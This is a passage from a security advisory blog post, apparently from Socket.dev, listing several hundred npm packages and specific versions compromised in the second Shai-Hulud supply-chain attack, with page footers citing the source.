362. @postman/postman-mcp-cli (v1.0.3, v1.0.4, v1.0.5)
363. @postman/postman-mcp-server (v2.4.10, v2.4.11, v2.4.12)
364. @postman/pretty-ms (v6.1.1, v6.1.2, v6.1.3)
365. @postman/secret-scanner-wasm (v2.1.2, v2.1.3, v2.1.4)
366. @postman/tunnel-agent (v0.6.5, v0.6.6, v0.6.7)
367. @postman/wdio-allure-reporter (v0.0.7, v0.0.8, v0.0.9)
368. @postman/wdio-junit-reporter (v0.0.4, v0.0.5, v0.0.6)
369. @pradhumngautam/common-app (v1.0.2)
370. @productdevbook/animejs-vue (v0.2.1)
371. @productdevbook/auth (v0.2.2)
372. @productdevbook/chatwoot (v2.0.1)
373. @productdevbook/motion (v1.0.4)
374. @productdevbook/ts-i18n (v1.4.2)
375. @pruthvi21/use-debounce (v1.0.3)
376. @quick-start-soft/quick-document-translator (v1.4.2511142126)
377. @quick-start-soft/quick-git-clean-markdown (v1.4.2511142126)
378. @quick-start-soft/quick-markdown (v1.4.2511142126)
379. @quick-start-soft/quick-markdown-compose (v1.4.2506300029)
380. @quick-start-soft/quick-markdown-image (v1.4.2511142126)
381. @quick-start-soft/quick-markdown-print (v1.4.2511142126)
382. @quick-start-soft/quick-markdown-translator (v1.4.2509202331)
383. @quick-start-soft/quick-remove-image-background (v1.4.2511142126)
384. @quick-start-soft/quick-task-refine (v1.4.2511142126)
385. @relyt/claude-context-core (v0.1.1)
386. @relyt/claude-context-mcp (v0.1.1)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 18 of 29

387. @relyt/mcp-server-relytone (v0.0.3)
388. @sameepsi/sor (v1.0.3, v2.0.2)
389. @sameepsi/sor2 (v2.0.2)
390. @seezo/sdr-mcp-server (v0.0.5)
391. @seung-ju/next (v0.0.2)
392. @seung-ju/openapi-generator (v0.0.4)
393. @seung-ju/react-hooks (v0.0.2)
394. @seung-ju/react-native-action-sheet (v0.2.1)
395. @silgi/better-auth (v0.8.1)
396. @silgi/drizzle (v0.8.4)
397. @silgi/ecosystem (v0.7.6)
398. @silgi/graphql (v0.7.15)
399. @silgi/module-builder (v0.8.8)
400. @silgi/openapi (v0.7.4)
401. @silgi/permission (v0.6.8)
402. @silgi/ratelimit (v0.2.1)
403. @silgi/scalar (v0.6.2)
404. @silgi/yoga (v0.7.1)
405. @sme-ui/aoma-vevasound-metadata-lib (v0.1.3)
406. @strapbuild/react-native-date-time-picker (v2.0.4)
407. @strapbuild/react-native-perspective-image-cropper (v0.4.15)
408. @strapbuild/react-native-perspective-image-cropper-2 (v0.4.7)
409. @strapbuild/react-native-perspective-image-cropper-poojan31 (v0.4.6)
410. @suraj_h/medium-common (v1.0.5)
411. @thedelta/eslint-config (v1.0.2)
412. @tiaanduplessis/json (v2.0.2, v2.0.3)
413. @tiaanduplessis/react-progressbar (v1.0.1, v1.0.2)
414. @trackstar/angular-trackstar-link (v1.0.2)
415. @trackstar/react-trackstar-link (v2.0.21)
416. @trackstar/react-trackstar-link-upgrade (v1.1.10)
417. @trackstar/test-angular-package (v0.0.9)
418. @trackstar/test-package (v1.1.5)
419. @trefox/sleekshop-js (v0.1.6)
420. @trigo/atrix (v7.0.1)
421. @trigo/atrix-acl (v4.0.2)
422. @trigo/atrix-elasticsearch (v2.0.1)
423. @trigo/atrix-mongoose (v1.0.2)
424. @trigo/atrix-orientdb (v1.0.2)
425. @trigo/atrix-postgres (v1.0.3)
426. @trigo/atrix-pubsub (v4.0.3)
427. @trigo/atrix-redis (v1.0.2)
428. @trigo/atrix-soap (v1.0.2)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 19 of 29

429. @trigo/atrix-swagger (v3.0.1)
430. @trigo/bool-expressions (v4.1.3)
431. @trigo/eslint-config-trigo (v3.3.1)
432. @trigo/fsm (v3.4.2)
433. @trigo/hapi-auth-signedlink (v1.3.1)
434. @trigo/jsdt (v0.2.1)
435. @trigo/keycloak-api (v1.3.1)
436. @trigo/node-soap (v0.5.4)
437. @trigo/pathfinder-ui-css (v0.1.1)
438. @trigo/trigo-hapijs (v5.0.1)
439. @trpc-rate-limiter/cloudflare (v0.1.4)
440. @trpc-rate-limiter/hono (v0.1.4)
441. @varsityvibe/api-client (v1.3.36)
442. @varsityvibe/api-client (v1.3.37)
443. @varsityvibe/utils (v5.0.6)
444. @varsityvibe/validation-schemas (v0.6.7, v0.6.8)
445. @viapip/eslint-config (v0.2.4)
446. @vishadtyagi/full-year-calendar (v0.1.11)
447. @voiceflow/alexa-types (v2.15.60, v2.15.61)
448. @voiceflow/anthropic (v0.4.4, v0.4.5)
449. @voiceflow/api-sdk (v3.28.58, v3.28.59)
450. @voiceflow/backend-utils (v5.0.1, v5.0.2)
451. @voiceflow/base-types (v2.136.2, v2.136.3)
452. @voiceflow/body-parser (v1.21.2, v1.21.3)
453. @voiceflow/chat-types (v2.14.58, v2.14.59)
454. @voiceflow/circleci-config-sdk-orb-import (v0.2.1, v0.2.2)
455. @voiceflow/commitlint-config (v2.6.1, v2.6.2)
456. @voiceflow/common (v8.9.1, v8.9.2)
457. @voiceflow/default-prompt-wrappers (v1.7.3, v1.7.4)
458. @voiceflow/dependency-cruiser-config (v1.8.11, v1.8.12)
459. @voiceflow/dtos-interact (v1.40.1, v1.40.2)
460. @voiceflow/encryption (v0.3.2, v0.3.3)
461. @voiceflow/eslint-config (v7.16.4, v7.16.5)
462. @voiceflow/eslint-plugin (v1.6.1, v1.6.2)
463. @voiceflow/exception (v1.10.1, v1.10.2)
464. @voiceflow/fetch (v1.11.1, v1.11.2)
465. @voiceflow/general-types (v3.2.22, v3.2.23)
466. @voiceflow/git-branch-check (v1.4.3, v1.4.4)
467. @voiceflow/google-dfes-types (v2.17.12, v2.17.13)
468. @voiceflow/google-types (v2.21.12, v2.21.13)
469. @voiceflow/husky-config (v1.3.1, v1.3.2)
470. @voiceflow/logger (v2.4.2, v2.4.3)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 20 of 29

471. @voiceflow/metrics (v1.5.1, v1.5.2)
472. @voiceflow/natural-language-commander (v0.5.2, v0.5.3)
473. @voiceflow/nestjs-common (v2.75.2, v2.75.3)
474. @voiceflow/nestjs-mongodb (v1.3.1, v1.3.2)
475. @voiceflow/nestjs-rate-limit (v1.3.2, v1.3.3)
476. @voiceflow/nestjs-redis (v1.3.1, v1.3.2)
477. @voiceflow/nestjs-timeout (v1.3.1, v1.3.2)
478. @voiceflow/npm-package-json-lint-config (v1.1.1, v1.1.2)
479. @voiceflow/openai (v3.2.2, v3.2.3)
480. @voiceflow/pino (v6.11.3, v6.11.4)
481. @voiceflow/pino-pretty (v4.4.1, v4.4.2)
482. @voiceflow/prettier-config (v1.10.1, v1.10.2)
483. @voiceflow/react-chat (v1.65.3, v1.65.4)
484. @voiceflow/runtime (v1.29.1, v1.29.2)
485. @voiceflow/runtime-client-js (v1.17.2, v1.17.3)
486. @voiceflow/sdk-runtime (v1.43.1, v1.43.2)
487. @voiceflow/secrets-provider (v1.9.2, v1.9.3)
488. @voiceflow/semantic-release-config (v1.4.1, v1.4.2)
489. @voiceflow/serverless-plugin-typescript (v2.1.7, v2.1.8)
490. @voiceflow/slate-serializer (v1.7.3, v1.7.4)
491. @voiceflow/stitches-react (v2.3.2, v2.3.3)
492. @voiceflow/storybook-config (v1.2.2, v1.2.3)
493. @voiceflow/stylelint-config (v1.1.1, v1.1.2)
494. @voiceflow/test-common (v2.1.1, v2.1.2)
495. @voiceflow/tsconfig (v1.12.1, v1.12.2)
496. @voiceflow/tsconfig-paths (v1.1.4, v1.1.5)
497. @voiceflow/utils-designer (v1.74.19, v1.74.20)
498. @voiceflow/verror (v1.1.4, v1.1.5)
499. @voiceflow/vite-config (v2.6.2, v2.6.3)
500. @voiceflow/vitest-config (v1.10.2, v1.10.3)
501. @voiceflow/voice-types (v2.10.58, v2.10.59)
502. @voiceflow/voiceflow-types (v3.32.45, v3.32.46)
503. @voiceflow/widget (v1.7.18, v1.7.19)
504. @vucod/email (v0.0.3)
505. @zapier/ai-actions (v0.1.18, v0.1.19, v0.1.20)
506. @zapier/ai-actions-react (v0.1.12, v0.1.13, v0.1.14)
507. @zapier/babel-preset-zapier (v6.4.1, v6.4.2, v6.4.3)
508. @zapier/browserslist-config-zapier (v1.0.3, v1.0.4, v1.0.5)
509. @zapier/eslint-plugin-zapier (v11.0.3, v11.0.4, v11.0.5)
510. @zapier/mcp-integration (v3.0.1, v3.0.2, v3.0.3)
511. @zapier/secret-scrubber (v1.1.3, v1.1.4, v1.1.5)
512. @zapier/spectral-api-ruleset (v1.9.1, v1.9.2, v1.9.3)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 21 of 29

513. @zapier/stubtree (v0.1.2, v0.1.3, v0.1.4)
514. @zapier/zapier-sdk (v0.15.5, v0.15.6, v0.15.7)
515. 02-echo (v0.0.7)
516. ai-crowl-shield (v1.0.7)
517. arc-cli-fc (v1.0.1)
518. asciitranslator (v1.0.3)
519. asyncapi-preview (v1.0.1)
520. asyncapi-preview (v1.0.2)
521. atrix (v1.0.1)
522. atrix-mongoose (v1.0.1)
523. automation_model (v1.0.491)
524. avvvatars-vue (v1.1.2)
525. axios-builder (v1.2.1)
526. axios-cancelable (v1.0.1, v1.0.2)
527. axios-timed (v1.0.1, v1.0.2)
528. babel-preset-kinvey-flex-service (v0.1.1)
529. barebones-css (v1.1.3, v1.1.4)
530. benmostyn-frame-print (v1.0.1)
531. best_gpio_controller (v1.0.10)
532. better-auth-nuxt (v0.0.10)
533. better-queue-nedb (v0.1.5)
534. bidirectional-adapter (v1.2.2, v1.2.3)
535. bidirectional-adapter (v1.2.4, v1.2.5)
536. blinqio-executions-cli (v1.0.41)
537. blob-to-base64 (v1.0.3)
538. bool-expressions (v0.1.2)
539. buffered-interpolation-babylon6 (v0.2.8)
540. bun-plugin-httpfile (v0.1.1)
541. bytecode-checker-cli (v1.0.8, v1.0.9, v1.0.10, v1.0.11)
542. bytes-to-x (v1.0.1)
543. calc-loan-interest (v1.0.4)
544. capacitor-plugin-apptrackingios (v0.0.21)
545. capacitor-plugin-purchase (v0.1.1)
546. capacitor-plugin-scgssigninwithgoogle (v0.0.5)
547. capacitor-purchase-history (v0.0.10)
548. capacitor-voice-recorder-wav (v6.0.3)
549. ceviz (v0.0.5)
550. chrome-extension-downloads (v0.0.3, v0.0.4)
551. claude-token-updater (v1.0.3)
552. coinmarketcap-api (v3.1.2, v3.1.3)
553. colors-regex (v2.0.1)
554. command-irail (v0.5.4)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 22 of 29

555. compare-obj (v1.1.1, v1.1.2)
556. composite-reducer (v1.0.2, v1.0.3, v1.0.4, v1.0.5)
557. count-it-down (v1.0.1, v1.0.2)
558. cpu-instructions (v0.0.14)
559. create-director-app (v0.1.1)
560. create-glee-app (v0.2.2)
561. create-glee-app (v0.2.3)
562. create-hardhat3-app (v1.1.1, v1.1.2, v1.1.3, v1.1.4)
563. create-kinvey-flex-service (v0.2.1)
564. create-mcp-use-app (v0.5.3, v0.5.4)
565. create-silgi (v0.3.1)
566. crypto-addr-codec (v0.1.9)
567. css-dedoupe (v0.1.2)
568. csv-tool-cli (v1.2.1)
569. dashboard-empty-state (v1.0.3)
570. designstudiouiux (v1.0.1)
571. devstart-cli (v1.0.6)
572. dialogflow-es (v1.1.1, v1.1.2, v1.1.3, v1.1.4)
573. discord-bot-server (v0.1.2)
574. docusaurus-plugin-vanilla-extract (v1.0.3)
575. dont-go (v1.1.2)
576. dotnet-template (v0.0.3)
577. dotnet-template (v0.0.4)
578. drop-events-on-property-plugin (v0.0.2)
579. easypanel-sdk (v0.3.2)
580. electron-volt (v0.0.2)
581. email-deliverability-tester (v1.1.1)
582. enforce-branch-name (v1.1.3)
583. esbuild-plugin-brotli (v0.2.1)
584. esbuild-plugin-eta (v0.1.1)
585. esbuild-plugin-httpfile (v0.4.1)
586. eslint-config-kinvey-flex-service (v0.1.1)
587. eslint-config-nitpicky (v4.0.1)
588. eslint-config-trigo (v22.0.2)
589. eslint-config-zeallat-base (v1.0.4)
590. ethereum-ens (v0.8.1)
591. evm-checkcode-cli (v1.0.12, v1.0.13, v1.0.14, v1.0.15)
592. exact-ticker (v0.3.5)
593. expo-audio-session (v0.2.1)
594. expo-router-on-rails (v0.0.4)
595. express-starter-template (v1.0.10)
596. expressos (v1.1.3)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 23 of 29

597. fat-fingered (v1.0.1, v1.0.2)
598. feature-flip (v1.0.1, v1.0.2)
599. firestore-search-engine (v1.2.3)
600. fittxt (v1.0.2, v1.0.3)
601. flapstacks (v1.0.1, v1.0.2)
602. flatten-unflatten (v1.0.1, v1.0.2)
603. formik-error-focus (v2.0.1)
604. formik-store (v1.0.1)
605. frontity-starter-theme (v1.0.1)
606. fuzzy-finder (v1.0.5, v1.0.6)
607. gate-evm-check-code2 (v2.0.3, v2.0.4, v2.0.5, v2.0.6)
608. gate-evm-tools-test (v1.0.5, v1.0.6, v1.0.7, v1.0.8)
609. gatsby-plugin-antd (v2.2.1)
610. gatsby-plugin-cname (v1.0.1, v1.0.2)
611. generator-meteor-stock (v0.1.6)
612. generator-ng-itobuz (v0.0.15)
613. get-them-args (v1.3.3)
614. github-action-for-generator (v2.1.27)
615. github-action-for-generator (v2.1.28)
616. gitsafe (v1.0.5)
617. go-template (v0.1.8)
618. go-template (v0.1.9)
619. gulp-inject-envs (v1.2.1, v1.2.2)
620. haufe-axera-api-client (v0.0.1, v0.0.2)
621. hope-mapboxdraw (v0.1.1)
622. hopedraw (v1.0.3)
623. hover-design-prototype (v0.0.5)
624. httpness (v1.0.2, v1.0.3)
625. hyper-fullfacing (v1.0.3)
626. hyperterm-hipster (v1.0.7)
627. ids-css (v1.5.1)
628. ids-enterprise-mcp-server (v0.0.2)
629. ids-enterprise-ng (v20.1.6)
630. ids-enterprise-typings (v20.1.6)
631. image-to-uri (v1.0.1, v1.0.2)
632. insomnia-plugin-random-pick (v1.0.4)
633. invo (v0.2.2)
634. iron-shield-miniapp (v0.0.2)
635. ito-button (v8.0.3)
636. itobuz-angular (v0.0.1)
637. itobuz-angular-auth (v8.0.11)
638. itobuz-angular-button (v8.0.11)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 24 of 29

639. jacob-zuma (v1.0.1, v1.0.2)
640. jaetut-varit-test (1.0.2)
641. jan-browser (v0.13.1)
642. jquery-bindings (v1.1.2, v1.1.3)
643. jsonsurge (v1.0.7)
644. just-toasty (v1.7.1)
645. kill-port (v2.0.2, v2.0.3)
646. kinetix-default-token-list (v1.0.5)
647. kinvey-cli-wrapper (v0.3.1)
648. kinvey-flex-scripts (v0.5.1)
649. kns-error-code (v1.0.8)
650. korea-administrative-area-geo-json-util (v1.0.7)
651. kwami (v1.5.9, v1.5.10)
652. lang-codes (v1.0.1, v1.0.2)
653. license-o-matic (v1.2.1, v1.2.2)
654. lint-staged-imagemin (v1.3.1, v1.3.2)
655. lite-serper-mcp-server (v0.2.2)
656. lui-vue-test (v0.70.9)
657. luno-api (v1.2.3)
658. m25-transaction-utils (v1.1.16)
659. manual-billing-system-miniapp-api (v1.3.1)
660. mcp-use (v1.4.2, v1.4.3)
661. medusa-plugin-announcement (v0.0.3)
662. medusa-plugin-logs (v0.0.17)
663. medusa-plugin-momo (v0.0.68)
664. medusa-plugin-product-reviews-kvy (v0.0.4)
665. medusa-plugin-zalopay (v0.0.40)
666. mod10-check-digit (v1.0.1)
667. mon-package-react-typescript (v1.0.1)
668. my-saeed-lib (v0.1.1)
669. n8n-nodes-tmdb (v0.5.1)
670. n8n-nodes-vercel-ai-sdk (v0.1.7)
671. n8n-nodes-viral-app (v0.2.5)
672. nanoreset (v7.0.1, v7.0.2)
673. next-circular-dependency (v1.0.2, v1.0.3)
674. next-simple-google-analytics (v1.1.1, v1.1.2)
675. next-styled-nprogress (v1.0.4, v1.0.5)
676. ngx-useful-swiper-prosenjit (v9.0.2)
677. ngx-wooapi (v12.0.1)
678. nitro-graphql (v1.5.12)
679. nitro-kutu (v0.1.1)
680. nitrodeploy (v1.0.8)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 25 of 29

681. nitroping (v0.1.1)
682. normal-store (v1.3.1, v1.3.2, v1.3.3, v1.3.4)
683. nuxt-keycloak (v0.2.2)
684. obj-to-css (v1.0.2, v1.0.3)
685. okta-react-router-6 (v5.0.1)
686. open2internet (v0.1.1)
687. orbit-boxicons (v2.1.3)
688. orbit-nebula-draw-tools (v1.0.10)
689. orbit-nebula-editor (v1.0.2)
690. orbit-soap (v0.43.13)
691. orchestrix (v12.1.2)
692. package-tester (v1.0.1)
693. parcel-plugin-asset-copier (v1.1.2, v.1.1.3)
694. pdf-annotation (v0.0.2)
695. pergel (v0.13.2)
696. pergeltest (v0.0.25)
697. piclite (v1.0.1)
698. pico-uid (v1.0.3, v1.0.4)
699. pkg-readme (v1.1.1)
700. posthog-react-native-session-replay (v1.2.2)
701. poper-react-sdk (v0.1.2)
702. posthog-docusaurus (v2.0.6)
703. posthog-js (v1.297.3)
704. posthog-node (v4.18.1, v5.11.3, v5.13.3)
705. posthog-node (v4.18.1) - Java/Maven
706. posthog-plugin-hello-world (v1.0.1)
707. posthog-react-native (v4.11.1, v4.12.5)
708. prime-one-table (v0.0.19)
709. prompt-eng (v1.0.50)
710. prompt-eng-server (v1.0.18)
711. puny-req (v1.0.3)
712. quickswap-ads-list (v1.0.33)
713. quickswap-default-staking-list (v1.0.11)
714. quickswap-default-staking-list-address (v1.0.55)
715. quickswap-default-token-list (v1.5.16)
716. quickswap-router-sdk (v1.0.1)
717. quickswap-sdk (v3.0.44)
718. quickswap-smart-order-router (v1.0.1)
719. quickswap-token-lists (v1.0.3)
720. quickswap-v2-sdk (v2.0.1)
721. ra-auth-firebase (v1.0.3)
722. ra-data-firebase (v1.0.7, v1.0.8)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 26 of 29

723. react-component-taggers (v0.1.9)
724. react-data-to-export (v1.0.1)
725. react-element-prompt-inspector (v0.1.18)
726. react-favic (v1.0.2)
727. react-hook-form-persist (v3.0.1, v3.0.2)
728. react-jam-icons (v1.0.1, v1.0.2)
729. react-keycloak-context (v1.0.8, v1.0.9)
730. react-library-setup (v0.0.6)
731. react-linear-loader (v1.0.2)
732. react-micromodal.js (v1.0.1, v1.0.2)
733. react-native-datepicker-modal (v1.3.1, v1.3.2)
734. react-native-email (v2.1.1, v2.1.2)
735. react-native-fetch (v2.0.1, v2.0.2)
736. react-native-get-pixel-dimensions (v1.0.1, v1.0.2)
737. react-native-google-maps-directions (v2.1.2)
738. react-native-jam-icons (v1.0.1, v1.0.2)
739. react-native-log-level (v1.2.1, v1.2.2)
740. react-native-modest-checkbox (v3.3.1)
741. react-native-modest-storage (v2.1.1)
742. react-native-phone-call (v1.2.1, v1.2.2)
743. react-native-retriable-fetch (v2.0.1, v2.0.2)
744. react-native-use-modal (v1.0.3)
745. react-native-view-finder (v1.2.1, v1.2.2)
746. react-native-websocket (v1.0.3, v1.0.4)
747. react-native-worklet-functions (v3.3.3)
748. react-packery-component (v1.0.3)
749. react-qr-image (v1.1.1)
750. react-scrambled-text (v1.0.4, v1.0.5)
751. rediff (v1.0.5)
752. rediff-viewer (v0.0.7)
753. redux-forge (v2.5.3)
754. redux-router-kit (v1.2.2, v1.2.3, v1.2.4)
755. revenuecat (v1.0.1)
756. rollup-plugin-httpfile (v0.2.1)
757. sa-company-registration-number-regex (v1.0.1, v1.0.2)
758. sa-id-gen (v1.0.4, v1.0.5)
759. samesame (v1.0.3)
760. scgs-capacitor-subscribe (v1.0.11)
761. scgsffcreator (v1.0.5)
762. schob (v1.0.3)
763. selenium-session (v1.0.5)
764. selenium-session-client (v1.0.4)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 27 of 29

765. set-nested-prop (v2.0.1, v2.0.2)
766. shelf-jwt-sessions (v0.1.2)
767. shell-exec (v1.1.3, v1.1.4)
768. shinhan-limit-scrap (v1.0.3)
769. silgi (v0.43.30)
770. simplejsonform (v1.0.1)
771. skills-use (v0.1.1, v0.1.2)
772. solomon-api-stories (v1.0.2)
773. solomon-v3-stories (v1.15.6)
774. solomon-v3-ui-wrapper (v1.6.1)
775. soneium-acs (v1.0.1)
776. sort-by-distance (v2.0.1)
777. south-african-id-info (v1.0.2)
778. stat-fns (v1.0.1)
779. stoor (v2.3.2)
780. sufetch (v0.4.1)
781. super-commit (v1.0.1)
782. svelte-autocomplete-select (v1.1.1)
783. svelte-toasty (v1.1.2, v1.1.3)
784. tanstack-shadcn-table (v1.1.5)
785. tavily-module (v1.0.1)
786. tcsp (v2.0.2)
787. tcsp-draw-test (v1.0.5)
788. tcsp-test-vd (v2.4.4)
789. template-lib (v1.1.3, v1.1.4)
790. template-micro-service (v1.0.2, v1.0.3)
791. tenacious-fetch (v2.3.2, v2.3.3)
792. test-foundry-app (v1.0.1, v1.0.2, v1.0.3, v1.0.4)
793. test-hardhat-app (v1.0.1, v1.0.2, v1.0.3, v1.0.4)
794. test23112222-api (v1.0.1)
795. tiaan (v1.0.2)
796. tiptap-shadcn-vue (v0.2.1)
797. token.js-fork (v0.7.32)
798. toonfetch (v0.3.2)
799. trigo-react-app (v4.1.2)
800. ts-relay-cursor-paging (v2.1.1)
801. typeface-antonio-complete (v1.0.5)
802. typefence (v1.2.2, v1.2.3)
803. typeorm-orbit (v0.2.27)
804. unadapter (v0.1.3)
805. undefsafe-typed (v1.0.3, v1.0.4)
806. unemail (v0.3.1)
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 28 of 29

807. uniswap-router-sdk (v1.6.2)
808. uniswap-smart-order-router (v3.16.26)
809. uniswap-test-sdk-core (v4.0.8)
810. unsearch (v0.0.3)
811. uplandui (v0.5.4)
812. upload-to-play-store (v1.0.1, v1.0.2)
813. url-encode-decode (v1.0.1, v1.0.2)
814. use-unsaved-changes (v1.0.9)
815. v-plausible (v1.2.1)
816. valid-south-african-id (v1.0.3)
817. valuedex-sdk (v3.0.5)
818. vf-oss-template (v1.0.1, v1.0.2, v1.0.3, v1.0.4)
819. victoria-wallet-constants (v0.1.1, v0.1.2)
820. victoria-wallet-core (v0.1.1, v0.1.2)
821. victoria-wallet-type (v0.1.1, v0.1.2)
822. victoria-wallet-utils (v0.1.1, v0.1.2)
823. victoria-wallet-validator (v0.1.1, v0.1.2)
824. victoriaxoaquyet-wallet-core (v0.2.1, v0.2.2)
825. vite-plugin-httpfile (v0.2.1)
826. vue-browserupdate-nuxt (v1.0.5)
827. wallet-evm (v0.3.1, v0.3.2)
828. wallet-type (v0.1.1, v0.1.2)
829. web-scraper-mcp (v1.1.4)
830. web-types-htmx (v0.1.1)
831. web-types-lit (v0.1.1)
832. webpack-loader-httpfile (v0.2.1)
833. wellness-expert-ng-gallery (v5.1.1)
834. wenk (v1.0.9, v1.0.10)
835. zapier-async-storage (v1.0.1, v1.0.2, v1.0.3)
836. zapier-platform-cli (v18.0.2, v18.0.3, v18.0.4)
837. zapier-platform-core (v18.0.2, v18.0.3, v18.0.4)
838. zapier-platform-legacy-scripting-runner (v4.0.2, v4.0.3, v4.0.4)
839. zapier-platform-schema (v18.0.2, v18.0.3, v18.0.4)
840. zapier-scripts (v7.8.3, v7.8.4)
841. zuper-cli (v1.0.1)
842. zuper-sdk (v1.0.57)
843. zuper-stream (v2.0.9)
Source: https://socket.dev/blog/shai-hulud-strikes-again-v2
https://socket.dev/blog/shai-hulud-strikes-again-v2
Page 29 of 29